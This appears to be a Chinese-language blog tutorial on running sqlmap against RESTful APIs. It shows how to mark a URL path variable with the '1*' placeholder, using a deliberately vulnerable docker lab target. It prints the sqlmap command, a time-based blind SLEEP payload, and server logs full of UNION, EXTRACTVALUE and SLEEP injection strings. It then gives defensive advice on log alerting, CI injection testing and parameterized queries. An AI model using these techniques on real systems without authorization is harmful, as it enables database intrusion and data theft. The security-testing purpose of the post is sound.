從sql注入談運維基礎建設 - 使用 sqlmap 根據變數位置定點注入 restful api
sqlmap 是一款強勁自動化的 sql 注入工具, 使用 python 開發, 支援 python 2/3。
RESTful API 規則幾乎是當前開發執行的預設規範。
在 restful 介面中, 常常將變數位置放置在 url 中。例如 http://127.0.0.1:8080/{user}/profile , 其中 {user} 就是變數,根據程式碼實現方式,可以等價於 http://127.0.0.1:8080/profile?user={user} 。
那麼, 在對這類 restful 介面進行 sql 注入的時候,又該注意什麼呢?本文將通過實驗, 進行簡單介紹。
先說結論
在進行 restful 介面注入的時候, 需要在變數位置使用佔位符, 通常為 1* 。
例如介面如下
- 介面規則: http://127.0.0.1:8080/{user}/profile
- 實際使用:
- 注入規則:
- 實際上, 可以簡寫為 *
準備工作
掃描工具
- sqlmap
執行環境
- 資料庫: mysql 5.7
- 注入靶機: [vulhub/sqli/restful
- 程式碼實現 - github
- doslab/vulhub-sqli:latest 映象: docker pull doslab/vulhub-sqli:latest
搭建環境
這裡使用 docker-compose 快速搭建環境
docker-compose.yml
# docker-compose.yml version: '3.1' services: mysql: image: mysql:5.7 restart: always environment: MYSQL_ROOT_PASSWORD: root123 sqli: image: doslab/vulhub-sqli ports: - 8080:8080
# 啟動
$ docker-compose up -d
# 檢視啟動狀態
$ docker-compose ps
# 驗證資料庫是否初始化
$ curl http://127.0.0.1:8080/v1/admin/admin
## {"name":"admin","password":"admin"}
注意: 由於 mysql 初始化需要一定時間, 所以在 vulhub-sqli 啟動時 可能無法正常初始化資料庫 或 無法正常啟動 。此時使用 docker-compose restart sqli 或 docker-compose up -d 即可。
sqlmap 注入
在 github 上 clone 程式碼到本地並安裝依賴元件。具體操作可以按照說明進行。這裡建議使用 git clone 方式, 一遍後續更新。
或者, 使用筆者預先做好的映象 docker 映象 docker pull tangx/sqlmap 。
這裡, 筆者使用 docker 進行注入操作
# 啟動執行 sqlmap 環境
$ docker run --rm -it tangx/sqlmap:latest bash
在 vulhub-sqli 靶機中的 API GET http://your-ip:8080/v0/${user}/${password} 中有兩個變數 user 和 password 。任意使用其中給一個,均可完成注入。
這裡我們在變數 password 的位置使用佔位符 1*。
$ ./sqlmap.py -u "http://yourip:8080/v0/admin/1*" --batch
[19:00:42] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.233.3:8080/v0/admin/1' AND (SELECT 5249 FROM (SELECT(SLEEP(5)))xozz) AND 'oVDy'='oVDy
---
[19:00:57] [INFO] the back-end DBMS is MySQL
[19:00:57] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[19:00:57] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[19:00:57] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.233.3'
從日誌結果我們可以看到 Type: time-based blind,靶機有 時間盲注 漏洞。
運維體系加固
首先,我們觀察一下 sqlmap 留下的日誌。
介面部分日誌如下
[GIN] 2020/12/02 - 19:00:31 | 200 | 456.835µs | 192.168.32.1 | GET "/v0/admin/1'sHvusK<'\">DyNhdx"
[GIN] 2020/12/02 - 19:00:31 | 200 | 474.341µs | 192.168.32.1 | GET "/v0/admin/1) AND 5498=7607 AND (9169=9169"
[GIN] 2020/12/02 - 19:00:31 | 200 | 467.909µs | 192.168.32.1 | GET "/v0/admin/1 AND 1526=1615"
... lue ...
[GIN] 2020/12/02 - 19:00:31 | 200 | 471.358µs | 192.168.32.1 | GET "/v0/admin/1' AND EXTRACTVALUE(1745,CONCAT(0x5c,0x716b7a7171,(SELECT (ELT(1745=1745,1))),0x7178706271)) AND 'Sdog'='Sdog"
[GIN] 2020/12/02 - 19:00:31 | 200 | 311.095µs | 192.168.32.1 | GET "/v0/admin/1 AND EXTRACTVALUE(1745,CONCAT(0x5c,0x716b7a7171,(SELECT (ELT(1745=1745,1))),0x7178706271))-- PuIi"
... lue ...
[GIN] 2020/12/02 - 19:00:42 | 200 | 390.044µs | 192.168.32.1 | GET "/v0/admin/1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
time="2020-12-02T19:00:42Z" level=error msg="get user failed: Error 1222: The used SELECT statements have a different number of columns"
[GIN] 2020/12/02 - 19:00:42 | 200 | 371.442µs | 192.168.32.1 | GET "/v0/admin/1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
... lue ...
[GIN] 2020/12/02 - 19:00:57 | 200 | 445.171µs | 192.168.32.1 | GET "/v0/admin/1' AND (SELECT 6597 FROM (SELECT(SLEEP(5-(IF(@@VERSION_COMMENT LIKE 0x256472697a7a6c6525,0,5)))))QvWg) AND 'ftQy'='ftQy"
[GIN] 2020/12/02 - 19:00:57 | 200 | 369.366µs | 192.168.32.1 | GET "/v0/admin/1' AND (SELECT 5784 FROM (SELECT(SLEEP(5-(IF(@@VERSION_COMMENT LIKE 0x25506572636f6e6125,0,5)))))pKCS) AND 'WJHr'='WJHr"
time="2020-12-02T19:00:57Z" level=error msg="get user failed: Error 1305: FUNCTION vulhub.AURORA_VERSION does not exist"
... lue ...
通過日誌不難看出, sqlmap 在測試注入的時候, 使用了各種型別的資料庫函式。因此, 可以完善日誌系統, 針對異常介面引數進行及時告警和跟進處理 。
當然, 如果真被 sql 注入***了, 那之後的優化也封堵也不過是亡羊補牢。所以, 更好的辦法是 在 CI 完成釋出到測試環境之後立即進行注入測試 , 將事故扼殺在萌芽中。
補充
doslab/vulhub-sqli 額外提供了同樣功能,但無注入危險的一個介面 GET http://your-ip:8080/v1/{user}/{password} ( 注意這裡是 v1 ) 。不同的是,該介面查詢使用的時候 golang mysql 庫進行的 Query 查詢操作; 而非自己拼寫 sql 語句。